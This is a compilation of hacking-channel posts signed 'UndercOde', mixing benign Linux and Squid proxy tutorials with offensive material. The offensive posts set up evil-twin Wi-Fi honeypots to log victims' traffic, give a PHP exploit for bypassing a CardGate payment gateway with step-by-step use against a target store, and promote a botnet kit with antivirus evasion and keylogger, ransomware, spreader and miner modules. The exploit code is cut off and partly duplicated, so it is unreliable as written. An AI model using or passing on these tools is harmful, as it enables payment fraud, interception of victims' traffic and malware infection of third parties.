▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automate wifi attack 2020 :
WireSpy allows attackers to set up quick honeypots to carry out MITMAs. Monitoring and logging functionality is implemented in order to keep records of the victims' traffic/activities. Other tools can be used together with Wirespy to conduct more advanced attacks.
pinterest.com/UnderCodeOfficial

🦑 Two type of attacks are supported at the moment:

> Evil twin: Force victims to auto-connect to the honeypot by spoofing a "trusted" hotspot (clone an existing access point and de-authenticate its users to force them to transparently connect to the spoofed honeypot).

> Honeypot: Set up a simple rogue hotspot and wait for clients to connect.

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/aress31/wirespy

2)cd wirespy

3) chmod +x wirespy.sh

Run the script with root privileges:
$ sudo ./wirespy.sh

4) Type help to display the list of available commands.
Available commands
Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack

Commands:
clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Proxy Service-Access Control by URL in Squid :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


> The method of access control in Squid through the URL of the visited site:

> In Squid, It is convenient to perform access control through the URL of the visited site. An example is as follows:
Suppose you want to prevent users from accessing all sites with sex in the URL. You can do this:

1) Define a new acl via dstdom_regex. In this example we assume that this new acl is called badrul:
acl badurl dstdom_regex sex

2) Add the corresponding access control items. It should be noted that because Squid checks the legality of access one by one, you must add
http_access deny items (that is, prohibited items) before http_acces allow

3) to ensure that Squid can Check the project. For example:

http_access deny badurl

http_access allow all

http_access deny ...

and so on.

4) In this way, when the URL of the user accessing the site contains the word sex, Squid will prohibit their access and give an error message of forbidden access.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Proxy service-squid user authentication settings
instagram.com/UmdercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

By default, Squid does not have any authentication procedures, but user authentication can be achieved through external authentication procedures .

Generally there are the following authentication procedures: LDAP authentication, SMB authentication, mysql-based authentication, sock5-based password authentication,
and Radius-based authentication. The following describes the commonly used ncsa authentication. Ncsa is
one of the authentication programs that comes with the Squid source code package . The implementation steps are as follows:

1) Enter the / usr / local / squid / auth_modules / NCSA directory and execute:
make
make install

2) After the compilation is successful, the ncsa_auth executable file is generated, and the generated executable file is copied to the / usr / bin directory.

3) Modify the options in the squid.conf file.
acl auth_user proxy_auth REQUIRED
http_access allow auth_user
authenticate_program / usr / local / squid / bin / ncsa_auth
/ usr / local / squid / etc / passwd

4) Use the tool htpasswd carried by Apache to generate a password file under / usr / locad / squid / etc. And add phase
Corresponding user information. Each line of the password file contains information about one user, namely the username and password. For example, use
htpasswd to generate a password file passwd and add the user me:
htpasswd -c / usr / local / squid / etc / passwd me

5) Restart Squid and the password authentication will take effect.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 CVE Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass ☠️
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).

[code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
*/

/*
Usage:

1) Change values of the constants (see below for TARGET & ORDER*)

2) Host this script somewhere (must be public accessible)

3) Register a merchant at https://cardgate.com

4) Sign into "My CardGate" dashboard

5) Add fake site or choose existing one

6) Click "Setup your Webshop" button in site preferences

7) Paste the URL of this script into the pop-up window and click "Save"

8) The target store now uses the settings of your site, enjoy :]


P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/

// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------

define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');

/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sToken_
* @param bool $bTestmode_
* @return string
*/
function pullConfig($sToken_, $bTestmode_ = FALSE) {
if (!is_string($sToken_)) {
throw new Exception('invalid token for settings pull: ' . $sToken_);
}

$sResource = "pullconfig/{$sToken_}/";
$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;

$rCh = curl_init();
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'Accept: application/json'
]);
if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);

if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
} else {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
}

if (FALSE == ($sResults = curl_exec($rCh))) {
$sError = curl_error($rCh);
curl_close($rCh);

🦑See full code on same git link
> tested by Underc0de

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How To Build Your Own Botnet 2020 Updated
Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules
t.me/UndercOdeTesting

🦑 FEATURES :

1) Generate fully-undetectable clients with staged payloads, remote imports, and unlimited post-exploitation modules

2) Remote Imports: remotely import third-party packages from the server without writing them to the disk or downloading/installing them
Nothing Written To The Disk: clients never write anything to the disk - not even temporary files (zero IO system calls are made) because remote imports allow arbitrary code to be dynamically loaded into memory and directly imported into the currently running process

3) Zero Dependencies (Not Even Python Itself): client runs with just the python standard library, remotely imports any non-standard packages/modules from the server, and can be compiled with a standalone python interpreter into a portable binary executable formatted for any platform/architecture, allowing it to run on anything, even when Python itself is missing on the target host

4) Add New Features With Just 1 Click: any python script, module, or package you copy to the ./byob/modules/ directory automatically becomes remotely importable & directly usable by every client while your command & control server is running

5) Write Your Own Modules: a basic module template is provided in ./byob/modules/ directory to make writing your own modules a straight-forward, hassle-free process

6) Run Unlimited Modules Without Bloating File Size: use remote imports to add unlimited features without adding a single byte to the client's file size

7) Fully Updatable: each client will periodically check the server for new content available for remote import, and will dynamically update its in-memory resources if anything has been added/removed

8) Platform Independent: everything is written in Python (a platform-agnostic language) and the clients generated can optionally be compiled into a portable executable (Windows) or bundled into a standalone application (macOS)

9) Bypass Firewalls: clients connect to the command & control server via reverse TCP connections, which will bypass most firewalls because the default filter configurations primarily block incoming connections
Counter-Measure Against Antivirus: avoids being analyzed by antivirus by blocking processes with names of known antivirus products from spawning

10) Encrypt Payloads To Prevent Analysis: the main client payload is encrypted with a random 256-bit key which exists solely in the payload stager which is generated along with it

11) Prevent Reverse-Engineering: by default, clients will abort execution if a virtual machine or sandbox is detected☠️

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) Clone On You Windows Or Linux
> https://github.com/malwaredllc/byob

2) GO to byob Folder

3) Check Those Lib each lib is specify to build Example :

> Keylogger (byob.modules.keylogger): logs the user’s keystrokes & the window name entered

> Screenshot (byob.modules.screenshot): take a screenshot of current user’s desktop

> Webcam (byob.modules.webcam): view a live stream or capture image/video from the webcam

> Ransom (byob.modules.ransom): encrypt files & generate random BTC wallet for ransom payment

> Outlook (byob.modules.outlook): read/search/upload emails from the local Outlook client

> Packet Sniffer (byob.modules.packetsniffer): run a packet sniffer on the host network & upload .pcap file

> Persistence (byob.modules.persistence): establish persistence on the host machine using 5 different methods

> Phone (byob.modules.phone): read/search/upload text messages from the client smartphone

> Escalate Privileges (byob.modules.escalate): attempt UAC bypass to gain unauthorized administrator privileges

> Port Scanner (byob.modules.portscanner): scan the local network for other online devices & open ports

> Process Control (byob.modules.process): list/search/kill/monitor currently running processes on the host

> iCloud (byob.modules.icloud): check for logged in iCloud account on macOS

> Spreader (byob.modules.spreader): spread client to other hosts via emails disguised as a plugin update

> Miner (byob.modules.miner): run a cryptocurrency miner in the background (supports Bitcoin & Litecoin)

>Fro More feel free to ask
@UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Use For Learn, Its illegal to use Botnet For Stealing-exploite

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How can i change master boot records (mbr) to gpt in kali linux Full Tested
instagram.com/UndercOdeTestingCompany

🦑Steps :(Powered by Wiki Tested by UndercOde-on ubuntu)

1) terminology

1) Converting

2) Configuring (+ Dual boot)

🦑 Terminology

BIOS = Basic Input/Output System

(U)EFI = (Unified) Extensible Firmware Interface
MBR = Master Boot Record
GPT = GUID Partition Table
UEFI / EFI / BIOS = Firmware interface
MBR / GPT = How the computer knows (per hard disk) what partitions are on the drive and
how to boot from them.

1) UEFI / BIOS
A firmware interface is the way that the firmware (the software inside devices) and operating system interact. It initialises the hardware then runs the operating system and ensures that the operating system drivers can operate the hardware.

2) The BIOS has been the usual firmware interface that has been used. The UEFI is a newer interface that has several features, such as being faster, having a GUI and being able to start the network card and get an ip address. UEFI replaces EFI. (Those developing EFI saw that there were others doing something similar and so joined them, bringing the ideas of EFI with them. This then became UEFI).

3) A BIOS requires the bootloader to be at the start of the disk, however a UEFI uses a partition for this and can choose among multiple boot loaders to use.
MBR / GPT + GRUB

4) The MBR is a section of code at the start of the disk that contains a boot loader (for the BIOS), as well as the partition map and a unique disk identifier.

5) To install GRUB onto a disk with a MBR, GRUB places a small program in the MBR to load the rest of GRUB from another part of the disk. (This is done because the MBR is too small to contain all of GRUB). The space that is chosen is space between the MBR and the first partition, which usually exists.

6) GPT is a standard for how the partitons are specified. It does have a 'protective' MBR, however this is only for allowing BIOS based computers to boot and stop tools that only know about MBR from trying to trash GPT. It can have
(How GPT is handled depends on whether it is booting using a BIOS (or UEFI system in BIOS emulation mode) or UEFI. I will focus on UEFI as it relates to the question).
Boot loaders for operating systems are stored in a partion called EFI System Partiton, that is formatted (usually) with FAT32. This is where GRUB is installed.

🦑 Converting
First...

1) We are playing around with the partition table, so guaranteed safety is not possible. It is a risky operation. However, the method should not lose data.
Others coming across this: Do not use on Apple Macs.
Now...

2) You will need to do this on a live CD (or another linux installation installed to a different disk.)

3) When dealing with GPT disks, we need to use a GPT aware program. 'GPT fdisk' is a good tool to use and what I will be using. It can be called gptfdisk or gdisk depending on distribution (Ubuntu calles it gdisk). Parted (and Gparted) is also GPT aware, so can 'safely' be used with GPT disks.

🦑 To convert you need to:

1 Resize partitions to fit GPT data and EFI system partition.

2 Convert the disk and add partitions

3 Install GRUB to EFI system partition.

1) Resize partition
Use parted (command line) or gparted (GUI) to resize the first and last partition. The first partion should have about 200MiB before it, and the last partition should have 1MiB to 2MiB (either will do) taken off the end.
2) Convert the disk
Run
gdisk /dev/sdx
changing the device you want to convert is /dev/sdx.
It should tell you that it will convert the partiton table.
GPT fdisk (gdisk) version 0.6.14

Partition table scan:
MBR: MBR only
BSD: not present
APM: not present
GPT: not present


*******************************************************
Found invalid GPT and valid MBR; converting MBR to GPT format.
THIS OPERATION IS POTENTIALLY DESTRUCTIVE! Exit by typing 'q' if
you don't want to convert your MBR partitions to GPT format!
*******************************************************

Command (? for help):
Now add a new partition, making it of type 'EFI system'. It should find the free space at the beginning (I suggest some low sector number like 34) and automatically use all the free space.

The examples use a 4GB USB flash drive with 1 partition already on there, resized as per above.
Command (? for help): n
Partition number (2-128, default 2): 2
First sector (34-7831518, default = 34) or {+-}size{KMGTP}:
Information: Moved requested sector from 34 to 2048 in
order to align on 2048-sector boundaries.
Use 'l' on the experts' menu to adjust alignment
Last sector (2048-421887, default = 421887) or {+-}size{KMGTP}:
Current type is 'Linux/Windows data'
Hex code or GUID (L to show codes, Enter = 0700): L
0700 Linux/Windows data 0c01 Microsoft reserved 2700 Windows RE
...
You should now have the EFI partition.
Command (? for help): p
Disk /dev/sdd: 7831552 sectors, 3.7 GiB
Logical sector size: 512 bytes
Disk identifier (GUID): 669247F2-37F7-4797-98F9-9CE56F7EA8C8
Partition table holds up to 128 entries
First usable sector is 34, last usable sector is 7831518
Partitions will be aligned on 2048-sector boundaries
Total free space is 4029 sectors (2.0 MiB)

Number Start (sector) End (sector) Size Code Name
1 421888 7829503 3.5 GiB 0700 Linux/Windows data
2 2048 421887 205.0 MiB EF00 EFI System
Then exit gdisk
Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed, possibly destroying your data? (Y/N): y
OK; writing new GUID partition table (GPT).
The operation has completed successfully.
Now use Gparted (or command-line mkfs.vfat -F 32 /dev/partition) to format the partition as FAT32.

3) Install GRUB

1 Find your EFI partition; mount it in /boot/efi. Add this to /etc/fstab¹

2 Install the grub-efi package

3 Switch your BIOS boot priority from UEFI and Legacy to UEFI only (or a similar option)

You should work out which version of grub-efi to install with
ioreg -l -p IODeviceTree | grep firmware-abi
If it says EFI32 install the grub-efi-ia32 package, if it says EFI64 install the grub-efi-amd64 package. You can install the packages with
sudo apt-get install <package name>
This will probably only work if you have booted in EFI mode.
If it does not work, you could try these step by step instructions (under "Install GRUB2 in (U)EFI systems") once grub-efi is installed.
Configuring (+ Dual Boot)
If RAOK's instructions work, you should be able to add the following line to /etc/grub.d/40_custom
menuentry "Windows 7" {
set root='(hd0,gpt1)'
chainloader /EFI/microsoft/bootmgfw.efi
}

It assumes that Windows is recognised as hd0 by GRUB. It may need to be changed to hd1 in order to work.
Now run
update-grub
to update the config file.

ENJOY
Powered BY wiki
# Tested by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Booting Linux from EPROM Full by UndercOde :

A method for running Linux on an embedded system without a hard disk is provided. The application we are going to introduce is the Operator Interface on a monitor. Its display system was developed by Boeing Flight Test. The flying environment requires a mechanism that prevents sudden power outages. To meet this requirement, we decided to implement the Operator Interface on a system without a hard disk.
twitter.com/UndercOdeTc

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The basic problem from the EPROM include a SSD (solid state disk) boot, the root file system from EPROM copied to a RAM disk, Operator Interface software is loaded from a client and executes it.

2) The hardware we chose was a

> VME-based single board computer with 16M RAM, a PC104 SSD capable of holding 4M EPROM, and some other PC104 boards. Its BIOS supports the use of SSD. The system uses a programmable keyboard and a standard VGA display card.

3) Operating system

at boot time we need to consider two options:

* Use loadlin under DOS (can be added to the Autoexec.bat file) to boot Linux

* install LILO boot Linux directly

benefit second option is slightly shorter boot time. We use the first solution because we use a programmable keyboard-software that programs the keyboard in DOS.

4) we need kernel-hacking. The Ramdisk.c code has been changed to load from any block device, not just from a floppy disk. In addition, we write a new block device driver from the EPROM device.

5) The first idea of ​​implementing EPROM device drivers is to generate a disk image in EPROM. This will give us a RAM disk of the same size as EPROM, in this case the size is 3.5M (the DOS partition of the SSD occupies 1 / 2M). To get a large RAM disk, we use a compressed disk image. The idea of ​​compression is simple. The same sector is stored once. The advantage is that the blank area of ​​the disk image does not occupy EPROM space.

6) In order to run the Operator interface program automatically, we need a program instead of getty.

> This program (dboot.c) should run the login program, which can set stdin, stdou and stderr for the specified virtual terminal.

🦑 The boot process is as follows:

for the memory test power l

l loading the DOS executes the AUTOEXEC.BAT

l keyboard application running

l LOADLIN-- running Linux kernel performs reading from the DOS partition

l by the linux kernel takes over

l from the EPROM disk loaded in RAM

L root file system to convert disk RAM

L reads the init inittab, inittab attention to the implementation of dboot instead of getty

L start Operator interface

development

task of the next phase is to EPROM disk content organization together. We

use the following auxiliary disks for this task:

* / dev / hda1 – 80M linux system

* / Dev / hda2-6M EPROM

* / dev / hda3-20M DOS partition

* Booting with Lilo

It takes time to program the EPROM directly. Therefore, most of our development is performed using spoke disks.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Booting Linux from EPROM Full by UndercOde Part 2 :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The development of a disk image first determines requirements. Complete a minimal system first, and then add the items required by the operator interface to the system. Since I am not a Unix expert, the completion of this minimal system is a trial and error process. I kept experimenting until the system was running normally.

1) The next step is to copy the contents of the Linux partition to the 6M partition, and then perform the following operations under DOS:

loadlin zimage root = / dev / hda2 ro

2) If the system is stable, load the 6M partition into the RAM disk. This is similar to loading from EPROM. In order to avoid programming the EPROM and testing the system, do the following under DOS:

> loadlin zimage root = / dev / hda2 ramdisk = 6144 ro

3) Because the ramdisk.c was modified, the / dev / hda2 disk image was loaded into RAM and The root partition is converted to a RAM disk. We need to continuously modify the disk image until it works properly.

4) Programming of EPROMs

first use tar to pack a small disk image, and then unzip the file to a clean system.

5) To pack the disk image. We boot from Linux and then load the 6M partition. Do not tar the proc file system. We use the following command:

mount –t ext2 / dev / hda2 / mnt

cd / mnt

tar –cpf /tmp/eprom.tar *

6) To generate a disk image, I used another computer with 6M RAM disk and the following command line:

dd if = / dev / zero of = / dev / ram count = 12288

mke2fs / dev / ram 6144

mount --t ext2 / dev / ram / mnt

cd / mnt

tar --xpf ~ / eprom.tar

dd if = / dev / ram of = ~ / eprom.dsk count = 12288

7) This generates an eprom.dsk File, we use the med.c program to write the disk image (eprom.dsk) to EPROMs (that is, to program EPROMs).

Med ~ / eprom.dsk ~ / eprom.img

8) Then the EPROM programmer will engrav the EPROM image into EPROM. The SSD function of the

DOS boot SSD
9) SBC helps us build a disk image. DOS SSD disk requires at least the following files: DOS boot file, command.com, autoexec.bat, keyboard loader, loadlin and zImage.

🦑 Conclusion The

development effort on the secondary disk is large, we need to take steps to reduce the workload. EPROM disk works very well in our application.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 Password Breach Hunting & Email OSINT tool, locally or using premium services. Supports chasing down related email
pinterest.com/UndercOdeOfficial

𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

>pip3 install h8mail

manual :

1) git clone https://github.com/khast3x/h8mail

2) cd h8mail

3) python3 setup.py

4) usage: h8mail [-h] [-t USER_TARGETS [USER_TARGETS ...]]
[-u USER_URLS [USER_URLS ...]] [-q USER_QUERY] [--loose]
[-c CONFIG_FILE [CONFIG_FILE ...]] [-o OUTPUT_FILE]
[-bc BC_PATH] [-sk] [-k CLI_APIKEYS [CLI_APIKEYS ...]]
[-lb LOCAL_BREACH_SRC [LOCAL_BREACH_SRC ...]]
[-gz LOCAL_GZIP_SRC [LOCAL_GZIP_SRC ...]] [-sf]
[-ch [CHASE_LIMIT]] [--power-chase] [--hide] [--debug]
[--gen-config]

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Home Of Malwares 2020
>theZoo is a project created to make the possibility of malware analysis
pinterest.com/UndercOdeOfficial

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) Clone the repository with git clone https://www.github.com/ytisf/theZoo. Go to the directory and run pip install --user -r requirements.txt. This should install all latest requirements needed. In total can be "scripted" like so:

git clone https://www.github.com/ytisf/theZoo

2) cd theZoo

3) pip install --user -r requirements.txt

4) Start by running the console:

python theZoo.py

5) You can call the program with the same command line arguments as before. The current default state of theZoo runtime is the CLI. The following files and directories are responsible for the application's behaviour.

/conf - The conf folder holds files relevant to the particular running of the program but are not part of the application. You can find the EULA file in the conf and more.

/imports - Contains .py import files used by the rest of the application

/malwares/Binaries - The actual malwares samples - be careful! These are very live.

/malware/Source - Malware source code.

> Malware under the folder Original is supposed to be (NO PROMISES!) the original source of the malware that leaked.

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Virus-malwares types
twitter.com/UndercOdetc

1) File viruses. Such viruses attach their own code to executable files (EXE, COM, BAT ...). A typical representative is " Black Friday ".

2) Guided virus . This type of virus inserts virus instructions into the boot sector , master boot record, or partition table of a hard disk . Typical representatives are cannabis virus , disk killer, etc.

3) Mixed viruses . Is a hybrid of the first two viruses, and quickly spread online through executable files .

4) Macro virus. In August 1995, Windows 95 was released, and it quickly became the mainstream operating system . Various viruses that had been under the DOS system for a while, gradually lost their vitality because they did not adapt to the new system. One new type of virus that has replaced it is one that also attacks executable files , such as the notorious CIH virus, and the other is macro viruses, which mainly infect macros defined by word processing software (such as Word) that is widely used daily . And thus spread rapidly. Melissa is the "outstanding" representative in this regard.

5) Network viruses . Network viruses spread through websites and emails . They are hidden in Java and ActiveX programs. If a user downloads a program with the virus, they immediately begin to disrupt activities. Due to the rapid spread of the Internet, this type of virus is even more harmful. Recently, activities have been rampant, and the destructive "love" virus belongs to this category.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Judge poisoning


1) security tools do not run

2) Online anti-virus web pages and files cannot be opened

3) Crashes with insufficient memory

4) Task manager, startup items are abnormal

5) Hard disk light, network card light flashing wildly

6) QQ, MSN, abnormal online game login

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Malwares controle :
>Because viruses cause serious damage to microcomputer resources, effective measures must be taken from both management and technical aspects to prevent virus intrusion.
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

In daily work, the main measures to prevent virus infection are:

1) First, and most importantly, choose and install an anti-virus software . As new viruses continue to appear (on average 13 a day), in today's highly shared and highly networked world, a computer must With anti-virus software installed, it is difficult to avoid virus attacks. Regularly check the microcomputers used, including the floppy disks and hard disks used, in order to detect viruses in time and prevent them before they occur.

2) Reduce the user's write power in the server. Keeping the power written in the server in the hands of as few people as possible can avoid unnecessary trouble and loss.

3) Prevent floppy disks and pirated optical disks of unknown origin. You should be extremely vigilant against floppy disks and pirated discs of unknown origin. Think carefully before you plug it into the drive. If you have to do so, first check the usb disk with anti-virus software and scan every file on the disk (not only Executable files only ), including compressed files . Similarly, when you give someone a dvd disk , write-protect the dvd disk in time so that viruses in other people's machines will not be transmitted to your dvd disk.

4) Scan the email before reading it . Some mail receiving software will automatically open the attachment after the user opens an email. Please turn off this function.

5) Be careful when downloading. Download files are one source of viruses.

Save the file in RTF or ASCII format. If you want to share some data with others on the network server , but do not want to know more about virus, then you better save the file as RTF or ASCII format, because these two file formats can avoid macro virus attacks .

6) Set up hard disk partitions reasonably and reserve remedial measures. Generally, the C drive should use FAT 32 format, and the capacity should be greater than 20 G. At this time, if the C drive is infected by a virus, more than 98% of the data can be recovered with the KV300, while using the FAT16 format, the C drive capacity is less than 20 G, and only 5% of the data can be recovered.
Use Ghost (clone) software and back up the hard disk to quickly restore the system.
or system windows settings

7) Upgrade anti-virus software in a timely manner and improve defense capabilities.

8) Important data and important files must be backed up- offline or cloud

9) check firewalls

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVSS Scores & Vulnerability Types windows server 2019 :
> The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

CVSS Score 2.1

Confidentiality Impact Partial (There is considerable informational disclosure.)

Integrity Impact None (There is no impact to the integrity of the system)


Availability Impact None (There is no impact to the availability of the system.)

Access Complexity Low (Specialized access conditions or extenuating circumstances

do not exist. Very little knowledge or skill is required to exploit. )

Authentication Not required (Authentication is not required to exploit the vulnerability.)

Gained Access None

Vulnerability Type(s) Bypass a restriction or similar
CWE ID 20

🦑 Effects :

1) The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.

2) The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

3) CVSS is a published standard used by organizations worldwide, and the SIG's mission is to continue to improve it.


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁